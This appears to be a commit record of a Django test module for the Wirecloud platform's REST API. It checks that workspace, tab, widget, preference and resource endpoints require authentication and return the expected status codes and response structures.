url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_entry_delete(self):
url = reverse('wirecloud_showcase.resource_entry', kwargs={'vendor': 'Wirecloud', 'name': 'Test', 'version': '1.0'})
self.client.login(username='admin', password='admin')
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
class ExtraApplicationMashupAPI(WirecloudTestCase):
fixtures = ('initial_data', 'selenium_test_data', 'user_with_workspaces')
tags = ('extra_rest_api',)
@classmethod
def setUpClass(cls):
super(ExtraApplicationMashupAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
# catalogue deployer
cls.old_catalogue_deployer = catalogue.wgt_deployer
cls.catalogue_tmp_dir = mkdtemp()
catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)
# showcase deployer
cls.old_deployer = showcase.wgt_deployer
cls.showcase_tmp_dir = mkdtemp()
showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
# deployers
catalogue.wgt_deployer = cls.old_catalogue_deployer
shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
showcase.wgt_deployer = cls.old_deployer
shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)
super(ExtraApplicationMashupAPI, cls).tearDownClass()
def test_iwidget_collection_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_collection_read(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
def test_iwidget_entry_read_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_iwidget_entry_read(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_read(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_platform_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.platform_preferences')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_platform_preference_collection_post(self):
url = reverse('wirecloud.platform_preferences')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'value': '5'},
'pref2': {'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_read(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_preference_collection_post(self):
url = reverse('wirecloud.workspace_preferences', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_tab_preference_collection_read_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_read(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_tab_preference_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
data = {
'pref1': {'inherit': 'false', 'value': '5'},
'pref2': {'inherit': 'true', 'value': 'false'}
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_tab_preference_collection_post(self):
url = reverse('wirecloud.tab_preferences', kwargs={'workspace_id': 2, 'tab_id': 101})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'pref1': '5',
'pref2': 'true',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
def test_workspace_publish_requires_authentication(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
def test_workspace_publish(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.5',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
def test_workspace_publish_bad_provided_data(self):
url = reverse('wirecloud.workspace_publish', kwargs={'workspace_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Test missing parameters
data = {
'name': ''
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Test invalid version
data = {
'vendor': 'Wirecloud',
'name': 'test-published-mashup',
'version': '1.0.05',
'email': 'test@example.com'
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
Improve workspace collection post tests
# -*- coding: utf-8 -*-
# Copyright 2013 Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
import os
from tempfile import mkdtemp
import shutil
from django.core.urlresolvers import reverse
from django.test import Client
from django.utils import simplejson
from wirecloud.catalogue import utils as catalogue
from wirecloud.catalogue.models import CatalogueResource
import wirecloud.commons.test
from wirecloud.commons.test import LocalDownloader, WirecloudTestCase
from wirecloud.commons.utils import downloader
from wirecloud.commons.utils.wgt import WgtDeployer
from wirecloud.platform.models import IWidget, Tab, VariableValue, Workspace
from wirecloud.platform.widget import utils as showcase
# Avoid nose to repeat these tests (they are run through wirecloud/platform/tests/__init__.py)
__test__ = False
class ApplicationMashupAPI(WirecloudTestCase):
fixtures = ('selenium_test_data', 'user_with_workspaces')
tags = ('rest_api')
@classmethod
def setUpClass(cls):
super(ApplicationMashupAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
def test_features(self):
url = reverse('wirecloud.features')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_collection_read_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_workspace_collection_read(self):
url = reverse('wirecloud.workspace_collection')
self.client.login(username='admin', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, list))
self.assertTrue(isinstance(response_data[0], dict))
def test_workspace_collection_post_requires_authentication(self):
url = reverse('wirecloud.workspace_collection')
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not created
self.assertFalse(Workspace.objects.filter(name='test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_collection_post(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
data = {
'name': 'test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'test')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=1, name='test').exists())
def test_workspace_collection_post_conflict(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingWorkspace',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_workspace_collection_post_creation_from_nonexistent_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/nonexistent-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
def test_workspace_collection_post_creation_from_mashup(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'Test Mashup')
self.assertTrue(isinstance(response_data['wiring'], dict))
# Workspace should be created
self.assertTrue(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_collection_post_creation_from_mashup_missing_dependencies(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {
'mashup': 'Wirecloud/test-mashup-dependencies/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('description' in response_data)
self.assertTrue('details' in response_data)
self.assertTrue('missingDependencies' in response_data['details'])
self.assertEqual(set(response_data['details']['missingDependencies']), set((
'Wirecloud/nonavailable-operator/1.0',
'Wirecloud/nonavailable-widget/1.0',
)))
# Workspace should not be created
self.assertFalse(Workspace.objects.filter(creator=2, name='Test Mashup').exists())
def test_workspace_collection_post_empty_required_fields(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Make the request
data = {}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 422)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('description' in response_data)
def test_workspace_collection_post_bad_request_syntax(self):
url = reverse('wirecloud.workspace_collection')
# Authenticate
self.client.login(username='normuser', password='admin')
# Test bad json syntax
response = self.client.post(url, 'bad syntax', content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 400)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_workspace_entry_read_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_read(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
# Response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertTrue('id' in response_data)
self.assertEqual(response_data['name'], 'ExistingWorkspace')
self.assertEqual(response_data['creator'], 'user_with_workspaces')
self.assertTrue('wiring' in response_data)
self.assertTrue('tabs' in response_data)
self.assertTrue(isinstance(response_data['tabs'], list))
self.assertTrue(len(response_data['tabs']) > 0)
self.assertTrue(isinstance(response_data['tabs'][0], dict))
self.assertTrue('id' in response_data['tabs'][0])
self.assertTrue('name' in response_data['tabs'][0])
self.assertTrue('preferences' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['preferences'], dict))
self.assertTrue('iwidgets' in response_data['tabs'][0])
self.assertTrue(isinstance(response_data['tabs'][0]['iwidgets'], list))
self.assertTrue('preferences' in response_data)
self.assertTrue(isinstance(response_data['preferences'], dict))
def test_workspace_entry_delete_requires_authentication(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace should be not deleted
self.assertTrue(Workspace.objects.filter(name='ExistingWorkspace').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_entry_delete(self):
url = reverse('wirecloud.workspace_entry', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace should be removed
self.assertFalse(Workspace.objects.filter(name='ExistingWorkspace').exists())
def test_workspace_wiring_entry_put_requires_authentication(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
workspace = Workspace.objects.get(id=1)
old_wiring_status = simplejson.loads(workspace.wiringStatus)
data = simplejson.dumps({
'operators': [{'name': 'Operator1'}],
'connections': [],
})
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Workspace wiring status should not have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, old_wiring_status)
# Check using Accept: text/html
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_workspace_wiring_entry_put(self):
url = reverse('wirecloud.workspace_wiring', kwargs={'workspace_id': 1})
new_wiring_status = {
'operators': [{'name': 'Operator1'}],
'connections': [],
}
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = simplejson.dumps(new_wiring_status)
response = self.client.put(url, data, content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Workspace wiring status should have change
workspace = Workspace.objects.get(id=1)
wiring_status = simplejson.loads(workspace.wiringStatus)
self.assertEqual(wiring_status, new_wiring_status)
def test_tab_collection_post_requires_authentication(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not created
self.assertFalse(Tab.objects.filter(name='rest_api_test').exists())
# Check using Accept: text/html
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_collection_post(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'rest_api_test',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
# Check basic response structure
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertEqual(response_data['name'], 'rest_api_test')
# Tab should be created
self.assertTrue(Tab.objects.filter(name='rest_api_test').exists())
def test_tab_collection_post_conflict(self):
url = reverse('wirecloud.tab_collection', kwargs={'workspace_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'ExistingTab',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 409)
def test_tab_entry_delete_requires_authentication(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Error response should be a dict
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'application/json')
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
# Tab should be not deleted
self.assertTrue(Tab.objects.filter(name='ExistingTab').exists())
# Check using Accept: text/html
response = self.client.delete(url, HTTP_ACCEPT='text/html')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# Content type of the response should be text/html
self.assertEqual(response['Content-Type'].split(';', 1)[0], 'text/html')
def test_tab_entry_delete(self):
url = reverse('wirecloud.tab_entry', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
# Tab should be removed
self.assertFalse(Tab.objects.filter(name='ExistingTab').exists())
def test_iwidget_collection_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not created
# TODO
def test_iwidget_collection_post(self):
url = reverse('wirecloud.iwidget_collection', kwargs={'workspace_id': 1, 'tab_id': 1})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'widget': 'Wirecloud/Test/1.0',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
def test_iwidget_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should be not updated
iwidget = IWidget.objects.get(pk=2)
self.assertNotEqual(iwidget.name, 'New Name')
def test_iwidget_entry_post(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'name': 'New Name',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# Check that the iwidget name has been changed
iwidget = IWidget.objects.get(pk=2)
self.assertEqual(iwidget.name, 'New Name')
def test_iwidget_preferences_entry_post_requires_authentication(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget preferences should not be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertNotEqual(variable_value.value, 'new value')
def test_iwidget_preferences_entry_post(self):
url = reverse('wirecloud.iwidget_preferences', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
data = {
'text': 'new value',
}
response = self.client.post(url, simplejson.dumps(data), content_type='application/json', HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget preferences should be updated
variable_value = VariableValue.objects.get(
user__username='user_with_workspaces',
variable__vardef__name='text',
variable__iwidget__id=2
)
self.assertEqual(variable_value.value, 'new value')
def test_iwidget_entry_delete_requires_authentication(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
self.assertTrue('WWW-Authenticate' in response)
# IWidget should not be deleted
IWidget.objects.get(pk=2)
def test_iwidget_entry_delete(self):
url = reverse('wirecloud.iwidget_entry', kwargs={'workspace_id': 2, 'tab_id': 101, 'iwidget_id': 2})
# Authenticate
self.client.login(username='user_with_workspaces', password='admin')
# Make the request
response = self.client.delete(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual(response.content, '')
# IWidget should be deleted
self.assertRaises(IWidget.DoesNotExist, IWidget.objects.get, pk=2)
class ResourceManagementAPI(WirecloudTestCase):
fixtures = ('selenium_test_data',)
tags = ('rest_api')
@classmethod
def setUpClass(cls):
super(ResourceManagementAPI, cls).setUpClass()
cls.client = Client()
cls._original_download_function = staticmethod(downloader.download_http_content)
downloader.download_http_content = LocalDownloader({
'http': {
'localhost:8001': os.path.join(os.path.dirname(wirecloud.commons.test.__file__), 'test-data', 'src'),
},
})
# catalogue deployer
cls.old_catalogue_deployer = catalogue.wgt_deployer
cls.catalogue_tmp_dir = mkdtemp()
catalogue.wgt_deployer = WgtDeployer(cls.catalogue_tmp_dir)
# showcase deployer
cls.old_deployer = showcase.wgt_deployer
cls.showcase_tmp_dir = mkdtemp()
showcase.wgt_deployer = WgtDeployer(cls.showcase_tmp_dir)
@classmethod
def tearDownClass(cls):
downloader.download_http_content = cls._original_download_function
# deployers
catalogue.wgt_deployer = cls.old_catalogue_deployer
shutil.rmtree(cls.catalogue_tmp_dir, ignore_errors=True)
showcase.wgt_deployer = cls.old_deployer
shutil.rmtree(cls.showcase_tmp_dir, ignore_errors=True)
super(ResourceManagementAPI, cls).tearDownClass()
def test_resource_collection_read_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_collection')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_collection_read(self):
url = reverse('wirecloud_showcase.resource_collection')
self.client.login(username='admin', password='admin')
response = self.client.get(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 200)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
for resource_id in response_data:
resource = response_data[resource_id]
self.assertTrue(isinstance(resource, dict))
self.assertIn('type', resource)
self.assertIn(resource['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', resource)
self.assertIn('name', resource)
self.assertIn('version', resource)
def test_resource_collection_post_requires_authentication(self):
url = reverse('wirecloud_showcase.resource_collection')
response = self.client.post(url, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 401)
def test_resource_collection_post(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
response = self.client.post(url, data={'file': f}, HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertIn('type', response_data)
self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', response_data)
self.assertIn('name', response_data)
self.assertIn('version', response_data)
def test_resource_collection_post_using_octet_stream(self):
url = reverse('wirecloud_showcase.resource_collection')
# Authenticate
self.client.login(username='admin', password='admin')
# Make the request
with open(os.path.join(self.shared_test_data_dir, 'Wirecloud_Test_Selenium_1.0.wgt'), 'rb') as f:
response = self.client.post(url, f.read(), content_type="application/octet-stream", HTTP_ACCEPT='application/json')
self.assertEqual(response.status_code, 201)
response_data = simplejson.loads(response.content)
self.assertTrue(isinstance(response_data, dict))
self.assertIn('type', response_data)
self.assertIn(response_data['type'], CatalogueResource.RESOURCE_TYPES)
self.assertIn('vendor', response_data)
